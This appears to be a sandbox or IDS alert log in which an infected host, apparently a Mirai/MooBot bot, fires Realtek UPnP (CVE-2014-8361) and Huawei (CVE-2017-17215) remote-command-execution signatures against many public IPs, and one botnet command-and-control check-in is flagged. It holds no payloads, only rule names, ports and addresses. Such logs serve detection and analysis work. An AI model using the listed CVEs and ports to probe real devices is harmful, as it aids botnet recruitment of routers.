                                                07/20/24-23:05:46.515260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615497652869192.168.2.14201.136.108.183
                                                07/20/24-23:05:56.994605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3411452869192.168.2.1487.182.203.169
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191037215192.168.2.14157.98.20.252
                                                07/20/24-23:05:46.135626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009037215192.168.2.1441.203.192.174
                                                07/20/24-23:06:21.974244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615014652869192.168.2.1419.70.239.97
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282237215192.168.2.14137.40.254.9
                                                07/20/24-23:05:57.518359TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23752452869192.168.2.14179.55.29.89
                                                07/20/24-23:06:03.314338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3708052869192.168.2.14145.234.43.35
                                                07/20/24-23:06:10.010711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3327452869192.168.2.1460.48.237.97
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462237215192.168.2.14212.218.115.20
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584637215192.168.2.14204.22.161.228
                                                07/20/24-23:05:45.094611TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614051052869192.168.2.1494.30.138.165
                                                07/20/24-23:05:57.822070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24132452869192.168.2.1478.180.137.61
                                                07/20/24-23:05:57.802006TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23831852869192.168.2.14113.89.22.57
                                                07/20/24-23:05:40.347577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4098852869192.168.2.1423.7.74.55
                                                07/20/24-23:05:56.454514TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5701652869192.168.2.14198.222.64.107
                                                07/20/24-23:06:02.463480TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615873652869192.168.2.1487.236.59.75
                                                07/20/24-23:07:06.736138TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23658452869192.168.2.149.213.251.239
                                                07/20/24-23:05:56.998513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5949652869192.168.2.1414.105.61.250
                                                07/20/24-23:06:00.719355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206437215192.168.2.1482.211.178.236
                                                07/20/24-23:06:05.676725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3724252869192.168.2.1477.92.149.55
                                                07/20/24-23:06:18.420371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4682452869192.168.2.14106.9.209.36
                                                07/20/24-23:05:38.250288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613308252869192.168.2.14204.155.193.18
                                                07/20/24-23:05:50.542034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450237215192.168.2.1441.0.21.214
                                                07/20/24-23:05:37.452253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4455252869192.168.2.14124.61.165.111
                                                07/20/24-23:05:56.124566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281437215192.168.2.14157.232.134.148
                                                07/20/24-23:06:03.208973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5073652869192.168.2.14179.72.247.135
                                                07/20/24-23:05:34.625646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127237215192.168.2.14157.146.42.35
                                                07/20/24-23:06:56.877705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3982052869192.168.2.1443.154.190.50
                                                07/20/24-23:06:27.692046TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5378052869192.168.2.14212.222.225.7
                                                07/20/24-23:05:58.772622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25447452869192.168.2.14102.163.53.206
                                                07/20/24-23:06:38.250934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5550052869192.168.2.14160.143.127.233
                                                07/20/24-23:05:35.381718TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614578052869192.168.2.1451.55.196.22
                                                07/20/24-23:05:39.680161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4926237215192.168.2.14157.64.66.226
                                                07/20/24-23:07:37.787409TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615974852869192.168.2.14200.217.154.137
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.1497.169.240.164
                                                07/20/24-23:05:57.925983TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613610652869192.168.2.14204.111.195.125
                                                07/20/24-23:05:52.493434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5321252869192.168.2.1491.116.209.39
                                                07/20/24-23:06:01.176056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3986252869192.168.2.1498.44.175.48
                                                07/20/24-23:05:46.088778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358437215192.168.2.14197.95.78.116
                                                07/20/24-23:05:37.464931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5216252869192.168.2.14131.84.155.33
                                                07/20/24-23:05:52.692606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5601652869192.168.2.14160.215.105.255
                                                07/20/24-23:06:01.363153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3474852869192.168.2.14146.125.220.156
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.14157.42.88.138
                                                07/20/24-23:05:37.468948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25720652869192.168.2.14113.47.213.157
                                                07/20/24-23:07:33.760297TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614990852869192.168.2.14152.214.0.28
                                                07/20/24-23:05:58.898489TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25875852869192.168.2.14222.246.191.243
                                                07/20/24-23:05:58.776696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4741852869192.168.2.14139.9.84.177
                                                07/20/24-23:05:50.559359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954437215192.168.2.1441.214.127.96
                                                07/20/24-23:06:01.176373TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25453052869192.168.2.14131.196.248.38
                                                07/20/24-23:05:33.855567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596037215192.168.2.1441.133.29.67
                                                07/20/24-23:07:06.283235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3948652869192.168.2.14146.238.26.98
                                                07/20/24-23:05:55.427852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4052652869192.168.2.1478.180.137.61
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884237215192.168.2.14157.241.104.134
                                                07/20/24-23:05:57.592012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4024252869192.168.2.14189.67.163.117
                                                07/20/24-23:05:57.551205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5537652869192.168.2.14160.37.99.47
                                                07/20/24-23:05:37.455022TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23966052869192.168.2.149.71.131.31
                                                07/20/24-23:05:56.079797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890037215192.168.2.1441.145.23.161
                                                07/20/24-23:05:39.158428TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)431302466192.168.2.1415.235.203.214
                                                07/20/24-23:06:17.661736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615502452869192.168.2.1443.231.212.180
                                                07/20/24-23:05:58.087911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24091452869192.168.2.14136.239.147.161
                                                07/20/24-23:05:37.472705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23859052869192.168.2.14178.154.163.217
                                                07/20/24-23:05:38.008589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3710852869192.168.2.1462.189.116.240
                                                07/20/24-23:06:26.081693TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24661052869192.168.2.1444.44.140.237
                                                07/20/24-23:06:13.800662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4147452869192.168.2.14203.100.96.66
                                                07/20/24-23:05:37.470290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383652869192.168.2.14191.30.146.121
                                                07/20/24-23:06:09.812176TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4736052869192.168.2.14103.38.73.32
                                                07/20/24-23:06:09.682183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614325852869192.168.2.14101.119.132.162
                                                07/20/24-23:05:47.815872TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616019452869192.168.2.14182.31.232.148
                                                07/20/24-23:06:23.161234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4145652869192.168.2.14219.131.134.237
                                                07/20/24-23:05:45.435096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325037215192.168.2.1470.188.242.239
                                                07/20/24-23:05:57.062143TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25985252869192.168.2.14205.123.194.218
                                                07/20/24-23:06:01.884914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3472652869192.168.2.1475.122.142.231
                                                07/20/24-23:06:08.171917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3675252869192.168.2.14107.150.186.44
                                                07/20/24-23:05:48.876892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035437215192.168.2.14219.184.85.94
                                                07/20/24-23:05:52.475330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336252869192.168.2.14109.136.114.158
                                                07/20/24-23:06:25.602644TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614356052869192.168.2.1461.74.182.247
                                                07/20/24-23:06:38.067768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25298852869192.168.2.1469.183.175.186
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099237215192.168.2.14197.47.178.20
                                                07/20/24-23:05:38.653067TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5280252869192.168.2.1487.103.117.210
                                                07/20/24-23:05:47.787869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4700452869192.168.2.1473.41.138.160
                                                07/20/24-23:05:59.338625TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613943252869192.168.2.14216.168.149.77
                                                07/20/24-23:06:15.480465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5757852869192.168.2.1476.60.118.192
                                                07/20/24-23:05:56.900733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613617052869192.168.2.14199.172.167.2
                                                07/20/24-23:05:34.619289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476237215192.168.2.14197.94.74.21
                                                07/20/24-23:06:00.698150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615291652869192.168.2.14222.16.169.125
                                                07/20/24-23:06:00.164569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615155452869192.168.2.14196.194.6.236
                                                07/20/24-23:06:09.635095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3972452869192.168.2.14168.151.156.87
                                                07/20/24-23:06:00.736310TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24511452869192.168.2.14210.75.205.158
                                                07/20/24-23:05:47.108564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801637215192.168.2.14213.50.244.72
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432037215192.168.2.1441.57.48.10
                                                07/20/24-23:05:52.531088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24293852869192.168.2.14179.97.101.3
                                                07/20/24-23:06:39.662031TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25244452869192.168.2.14161.82.139.62
                                                07/20/24-23:05:37.446803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797052869192.168.2.14141.0.4.62
                                                07/20/24-23:05:56.880010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4618052869192.168.2.14128.70.217.129
                                                07/20/24-23:06:23.209420TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614556052869192.168.2.14133.4.216.224
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386637215192.168.2.1467.217.78.22
                                                07/20/24-23:05:57.204945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5274252869192.168.2.1432.213.80.182
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202437215192.168.2.14157.46.160.208
                                                07/20/24-23:05:52.544972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4926852869192.168.2.14183.7.180.129
                                                07/20/24-23:06:09.697115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613515852869192.168.2.14220.251.11.9
                                                07/20/24-23:06:23.413340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3593252869192.168.2.14157.225.189.81
                                                07/20/24-23:05:40.322039TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24565852869192.168.2.14125.180.243.83
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987037215192.168.2.14181.89.181.103
                                                07/20/24-23:06:13.097390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614172852869192.168.2.14150.173.238.1
                                                07/20/24-23:06:34.098635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4958252869192.168.2.1439.59.93.29
                                                07/20/24-23:05:57.164212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4033452869192.168.2.1438.235.221.67
                                                07/20/24-23:06:56.877705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013637215192.168.2.14123.151.1.145
                                                07/20/24-23:05:37.450149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4598052869192.168.2.14158.68.165.132
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095837215192.168.2.1441.176.223.222
                                                07/20/24-23:05:38.743174TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3490452869192.168.2.14200.28.88.206
                                                07/20/24-23:05:56.395498TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794652869192.168.2.14162.5.20.207
                                                07/20/24-23:06:50.982145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542252869192.168.2.1417.87.247.147
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845037215192.168.2.14197.6.98.173
                                                07/20/24-23:05:58.922584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4333852869192.168.2.1458.185.111.115
                                                07/20/24-23:06:02.949715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4515252869192.168.2.1434.151.91.57
                                                07/20/24-23:06:13.586481TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387252869192.168.2.1497.55.184.51
                                                07/20/24-23:05:56.439868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615711852869192.168.2.1437.110.135.88
                                                07/20/24-23:07:08.060226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6097052869192.168.2.14212.164.237.193
                                                07/20/24-23:05:40.333807TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23335652869192.168.2.1486.88.84.85
                                                07/20/24-23:05:44.488760TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24605452869192.168.2.1499.215.247.10
                                                07/20/24-23:07:08.369781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614377252869192.168.2.14133.103.255.70
                                                07/20/24-23:06:00.078168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614227252869192.168.2.14140.144.188.149
                                                07/20/24-23:06:01.813487TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23969252869192.168.2.14164.251.213.254
                                                07/20/24-23:05:37.524280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3897852869192.168.2.14145.195.83.181
                                                07/20/24-23:05:57.906796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614477052869192.168.2.14166.28.205.27
                                                07/20/24-23:05:40.467316TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23993052869192.168.2.14153.214.17.177
                                                07/20/24-23:05:45.429987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112037215192.168.2.1473.221.93.26
                                                07/20/24-23:05:35.342520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615099852869192.168.2.1436.216.251.126
                                                07/20/24-23:05:40.333807TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25710652869192.168.2.14168.22.240.103
                                                07/20/24-23:05:58.104584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614429452869192.168.2.14120.75.230.210
                                                07/20/24-23:06:11.251823TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615450452869192.168.2.142.53.21.232
                                                07/20/24-23:05:45.435097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784637215192.168.2.14157.250.253.113
                                                07/20/24-23:06:00.464582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5528452869192.168.2.14180.44.235.174
                                                07/20/24-23:06:03.679529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940852869192.168.2.14171.203.207.215
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105437215192.168.2.1441.154.38.234
                                                07/20/24-23:05:40.338978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5023252869192.168.2.14144.25.238.160
                                                07/20/24-23:07:15.616106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4621652869192.168.2.14133.45.19.120
                                                07/20/24-23:05:57.963204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5783252869192.168.2.14222.246.191.243
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395837215192.168.2.1470.79.186.162
                                                07/20/24-23:05:37.470289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100452869192.168.2.14175.91.47.151
                                                07/20/24-23:06:45.946586TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25067452869192.168.2.1412.142.133.82
                                                07/20/24-23:06:02.517784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5136052869192.168.2.14174.254.246.247
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897437215192.168.2.14157.129.248.161
                                                07/20/24-23:06:17.411596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4270452869192.168.2.14154.10.111.3
                                                07/20/24-23:05:37.453622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25658652869192.168.2.14114.225.14.65
                                                07/20/24-23:05:33.829339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14197.40.168.196
                                                07/20/24-23:05:38.587931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3749252869192.168.2.1465.34.121.12
                                                07/20/24-23:06:17.614211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615019252869192.168.2.1473.230.116.174
                                                07/20/24-23:06:02.175840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613673252869192.168.2.14135.213.61.54
                                                07/20/24-23:05:48.800446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068437215192.168.2.1441.26.0.156
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708037215192.168.2.14157.80.165.23
                                                07/20/24-23:05:52.701555TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23615052869192.168.2.14196.43.133.244
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282037215192.168.2.14197.107.43.58
                                                07/20/24-23:05:52.589392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24130252869192.168.2.14108.181.93.166
                                                07/20/24-23:05:36.367020TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615836452869192.168.2.1452.192.238.227
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293237215192.168.2.14197.251.112.30
                                                07/20/24-23:06:34.148720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3519052869192.168.2.1466.165.40.13
                                                07/20/24-23:05:52.475330TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24359252869192.168.2.14139.106.80.144
                                                07/20/24-23:05:47.711117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613845052869192.168.2.1431.227.142.212
                                                07/20/24-23:06:36.110698TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5347052869192.168.2.14160.237.156.120
                                                07/20/24-23:06:14.572816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5267052869192.168.2.1453.151.155.201
                                                07/20/24-23:05:35.495332TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615235852869192.168.2.14191.30.146.121
                                                07/20/24-23:06:03.193739TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25448452869192.168.2.14179.199.183.88
                                                07/20/24-23:05:45.424851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097437215192.168.2.1465.114.222.117
                                                07/20/24-23:05:35.197096TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3662652869192.168.2.14184.192.255.233
                                                07/20/24-23:05:58.592016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5616852869192.168.2.14169.22.244.181
                                                07/20/24-23:05:52.697720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969852869192.168.2.14203.201.159.16
                                                07/20/24-23:05:44.320091TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24672452869192.168.2.1499.151.162.57
                                                07/20/24-23:05:57.816478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613420252869192.168.2.145.133.222.207
                                                07/20/24-23:06:11.236923TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614317652869192.168.2.14105.141.150.128
                                                07/20/24-23:05:40.413672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5015052869192.168.2.14206.167.163.90
                                                07/20/24-23:06:09.712957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4033452869192.168.2.1444.212.106.74
                                                07/20/24-23:05:34.624854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989637215192.168.2.1441.19.68.136
                                                07/20/24-23:05:56.310476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645837215192.168.2.1478.27.140.117
                                                07/20/24-23:06:23.212855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4610852869192.168.2.14169.212.196.147
                                                07/20/24-23:05:52.472911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24186852869192.168.2.14223.161.15.138
